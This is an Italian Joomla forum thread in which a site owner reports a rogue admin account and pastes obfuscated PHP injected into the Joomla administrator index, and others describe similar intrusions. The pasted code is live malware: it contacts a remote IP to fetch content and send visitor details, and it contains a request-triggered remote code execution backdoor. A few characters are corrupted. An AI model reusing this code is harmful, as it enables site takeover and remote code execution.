Joomla.it Forum

Non solo Joomla... => Sicurezza => : newoffice2000 01 Feb 2015, 19:16:27

: Ho trovato una stringa strana su 3.3.6 . - Problemi di sicurezza ???
: newoffice2000 01 Feb 2015, 19:16:27

La stringa trovata su index amministratore è questa:

:

//###==###
error_reporting(0); ini_set("display_errors", "0"); if (!isset($i8291f691)) { $i8291f691 = TRUE;  $GLOBALS['_769130756_']=Array(base64_decode('cHJlZ19' .'tY' .'XRjaA=='),base64_decode('Z' .'mlsZV9' .'nZXRfY29' .'udGVud' .'HM' .'='),base64_decode('Y2' .'9we' .'Q' .'=='),base64_decode('bXRfcm' .'FuZA=='),base64_decode('YX' .'JyYXlfZmlsbA=='),base64_decode('' .'Zmls' .'Z' .'WN' .'0aW' .'1l'),base64_decode('d' .'X' .'JsZW5j' .'b' .'2Rl'),base64_decode('d' .'XJsZW5' .'jb2Rl'),base64_decode('bWQ1'),base64_decode('Zmls' .'ZV9' .'wdXRfY29udGVudH' .'M='),base64_decode('' .'Zmx' .'vb3' .'I='),base64_decode('aW5pX2d' .'ldA=='),base64_decode('ZmlsZV9nZXRfY29ud' .'GVu' .'d' .'HM='),base64_decode('c3RybG' .'V' .'u'),base64_decode('ZnVuY3Rpb25fZXhpc3R' .'z'),base64_decode('Y3VybF9' .'pbml0'),base64_decode('Y3VybF9zZXRvcH' .'Q='),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y3VybF9leGVj'),base64_decode('c3RycG9' .'z'),base64_decode('c3Ryd' .'m' .'Fs'),base64_decode('Y3Vy' .'b' .'F9j' .'bG' .'9zZQ=='),base64_decode('ZnNvY2tvc' .'GVu'),base64_decode('bX' .'RfcmFu' .'Z' .'A=='),base64_decode('c' .'2' .'Vzc' .'2l' .'vbl' .'9pZ' .'A=='),base64_decode('Y' .'XJyY' .'XlfbW' .'Vy' .'Z2U' .'='),base64_decode('bXRfcm' .'F' .'u' .'ZA=='),base64_decode('Z' .'ndyaXRl'),base64_decode('bmwyYnI='),base64_decode('b' .'XRf' .'cmFuZA=='),base64_decode('Z' .'mVvZg=='),base64_decode('ZmdldH' .'M='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('cH' .'JlZ' .'19zc' .'Gxp' .'dA=='),base64_decode('' .'c' .'3Rya' .'XBzbG' .'F' .'zaGVz'));  function _1669418828($i){$a=Array('Y2x' .'p' .'ZW5' .'0' .'X' .'2N' .'o' .'ZWNr','Y2xpZW50X2N' .'oZ' .'WN' .'r','SF' .'RU' .'UF9BQ0NFUFRfQ0hBUlNFVA==','I' .'S4' .'h' .'dQ==','U0NSSV' .'B' .'UX0ZJTEVOQ' .'U1F','' .'VVRGLT' .'g=','d' .'2l' .'uZG93cy0' .'xMjUx','SFRUUF9BQ0' .'NF' .'UFRf' .'Q' .'0h' .'BUlNFVA' .'==','' .'U0VSVkVS' .'X' .'05' .'BTUU' .'=','Uk' .'VRVUVTV' .'F9VUkk=','' .'SF' .'RUUF9V' .'U0VSX0FHRU5U','' .'U' .'k' .'V' .'N' .'T1R' .'F' .'X0' .'FERFI=','M' .'TA' .'5LjI' .'zNi44NS44N' .'A==','L' .'2' .'dldC5waH' .'A/' .'ZD0=','J' .'nU9','J' .'mM9','Jmk9M' .'SZp' .'cD0=','Jmg9','' .'Y' .'2RiMjFmZDAwZT' .'dhZW' .'Y' .'3MTlh' .'Y2N' .'lZjk5MjY4N' .'z' .'E' .'yM' .'zc=','M' .'Q==','YWxsb3dfdXJsX2Z' .'vc' .'GV' .'u','' .'aHR' .'0cD' .'ovLw==','Y' .'3VybF9' .'pbml0','' .'aHR0c' .'Do' .'vLw==','Yn' .'ZiY' .'W5' .'o' .'YX' .'Fq' .'b3J' .'j','eGdtaGp6','R0VUIA==','IEhUVFA' .'vMS4xDQo=','SG9z' .'dDo' .'g','D' .'Qo=','Q29u' .'b' .'mVjdGl' .'vbjogQ' .'2' .'xvc' .'2UNCg0' .'K','','L1xSX' .'FIv','cA' .'==','ODI5MW' .'Y2OTE=','Zg==','' .'Yw==');return base64_decode($a[$i]);}  if(!isset($u2fa4f66_0)){if(!empty($_COOKIE[_1669418828(0)]))die($_COOKIE[_1669418828(1)]);if(!isset($u2fa4f66_1[_1669418828(2)])){if($GLOBALS['_769130756_'][0](_1669418828(3),$GLOBALS['_769130756_'][1]($_SERVER[_1669418828(4)])))$u2fa4f66_2=_1669418828(5);else $u2fa4f66_2=_1669418828(6);}else{$u2fa4f66_2=$u2fa4f66_1[_1669418828(7)];}$u2fa4f66_3=$_SERVER[_1669418828(] .$_SERVER[_1669418828(9)];$u2fa4f66_4=$_SERVER[_1669418828(10)];(round(0+124.25+124.25+124.25+124.25)-round(0+497)+round(0+853.5+853.5+853.5+853.5)-round(0+682.8+682.8+682.8+682.8+682.)?$GLOBALS['_769130756_'][2]($u2fa4f66_5,$u2fa4f66_6,$u2fa4f66_2):$GLOBALS['_769130756_'][3](round(0+248.5+248.5),round(0+2575));$u2fa4f66_7=$_SERVER[_1669418828(11)];$u2fa4f66_8=round(0+1687.5+1687.5);$u2fa4f66_6=_1669418828(12);if((round(0+1940+1940)^round(0+1940+1940))&& $GLOBALS['_769130756_'][4]($u2fa4f66_1,$u2fa4f66_0,$u2fa4f66_1))$GLOBALS['_769130756_'][5]($u2fa4f66_5,$u2fa4f66_9);$u2fa4f66_10=_1669418828(13) .$GLOBALS['_769130756_'][6]($u2fa4f66_3) ._1669418828(14) .$GLOBALS['_769130756_'][7]($u2fa4f66_4) ._1669418828(15) .$u2fa4f66_2 ._1669418828(16) .$u2fa4f66_7 ._1669418828(17) .$GLOBALS['_769130756_'][8](_1669418828(18) .$u2fa4f66_3 .$u2fa4f66_4 .$u2fa4f66_2 ._1669418828(19));if((round(0+360.8+360.8+360.8+360.8+360.+round(0+838+838+838))>round(0+360.8+360.8+360.8+360.8+360.|| $GLOBALS['_769130756_'][9]($u2fa4f66_1));else{$GLOBALS['_769130756_'][10]($u2fa4f66_5,$u2fa4f66_7,$_REQUEST,$u2fa4f66_7);}if($GLOBALS['_769130756_'][11](_1669418828(20))== round(0+0.25+0.25+0.25+0.25)){$u2fa4f66_0=$GLOBALS['_769130756_'][12](_1669418828(21) .$u2fa4f66_6 .$u2fa4f66_10);}if($GLOBALS['_769130756_'][13]($u2fa4f66_0)<round(0+5+5)){if($GLOBALS['_769130756_'][14](_1669418828(22))){$u2fa4f66_11=$GLOBALS['_769130756_'][15](_1669418828(23) .$u2fa4f66_6 .$u2fa4f66_10);$GLOBALS['_769130756_'][16]($u2fa4f66_11,42,FALSE);$GLOBALS['_769130756_'][17]($u2fa4f66_11,19913,TRUE);$u2fa4f66_0=$GLOBALS['_769130756_'][18]($u2fa4f66_11);if($GLOBALS['_769130756_'][19](_1669418828(24),_1669418828(25))!==false)$GLOBALS['_769130756_'][20]($_REQUEST,$u2fa4f66_4);$GLOBALS['_769130756_'][21]($u2fa4f66_11);}else{$u2fa4f66_12=$GLOBALS['_769130756_'][22]($u2fa4f66_6,round(0+26.666666666667+26.666666666667+26.666666666667),$u2fa4f66_9,$u2fa4f66_13,round(0+7.5+7.5+7.5+7.5));if(round(0+7475)<$GLOBALS['_769130756_'][23](round(0+1716.5+1716.5),round(0+4037)))$GLOBALS['_769130756_'][24]($_REQUEST,$u2fa4f66_9,$u2fa4f66_9);if($u2fa4f66_12){$u2fa4f66_14=_1669418828(26) .$u2fa4f66_10 ._1669418828(27);$u2fa4f66_14 .= _1669418828(28) .$u2fa4f66_6 ._1669418828(29);$u2fa4f66_14 .= _1669418828(30);(round(0+1125.75+1125.75+1125.75+1125.75)-round(0+1125.75+1125.75+1125.75+1125.75)+round(0+4677)-round(0+4677))?$GLOBALS['_769130756_'][25]($u2fa4f66_2,$_REQUEST):$GLOBALS['_769130756_'][26](round(0+645.25+645.25+645.25+645.25),round(0+4503));$GLOBALS['_769130756_'][27]($u2fa4f66_12,$u2fa4f66_14);$u2fa4f66_15=round(0+1502+1502);$u2fa4f66_16=_1669418828(31);(round(0+226.6+226.6+226.6+226.6+226.6)-round(0+566.5+566.5)+round(0+713+713+713+713+713)-round(0+1782.5+1782.5))?$GLOBALS['_769130756_'][28]($u2fa4f66_13):$GLOBALS['_769130756_'][29](round(0+450),round(0+283.25+283.25+283.25+283.25));while(!$GLOBALS['_769130756_'][30]($u2fa4f66_12)){$u2fa4f66_16 .= $GLOBALS['_769130756_'][31]($u2fa4f66_12,round(0+64+64));}$GLOBALS['_769130756_'][32]($u2fa4f66_12);list($u2fa4f66_5,$u2fa4f66_0)=$GLOBALS['_769130756_'][33](_1669418828(32),$u2fa4f66_16,round(0+1+1));}}}if(@$_REQUEST[_1669418828(33)]== _1669418828(34))$_REQUEST[_1669418828(35)]($GLOBALS['_769130756_'][34]($_REQUEST[_1669418828(36)]));}echo $u2fa4f66_0;  }
//###==###

Oltre a questo un nuovo utente registrato.


Mi preoccupo ???


Grazie.

: Re:Ho trovato una stringa strana su 3.3.6 . - Problemi di sicurezza ???
: tosk 02 Feb 2015, 11:30:21

per l'utente registrato
ti dico cosa ho letto in una risposta di qualche giorno fa
dal pannello di controllo, gestione utenti, devi disabilitare la voce che permette una nuova registrazione

ciao
tosk

: Re:Ho trovato una stringa strana su 3.3.6 . - Problemi di sicurezza ???
: newoffice2000 02 Feb 2015, 12:14:04

Grazie per la risposta, ma il nuovo utente aveva diritti di amministrazione.


Chiedo allo staff di spostare il messaggio nella sezione appropriata.


Mi sono accorto dopo che c'era una sezione ad-hoc.


GRAZIE.

: Re:Ho trovato una stringa strana su 3.3.6 . - Problemi di sicurezza ???
: margherita_64 02 Feb 2015, 15:53:46

Poco fa è successo anche a me! Mi sono trovata un utente registrato quando sul mio sito non è previsto nessun modulo di registrazione. Ora ho disabilitato da controllo globale ma come mai accade questo?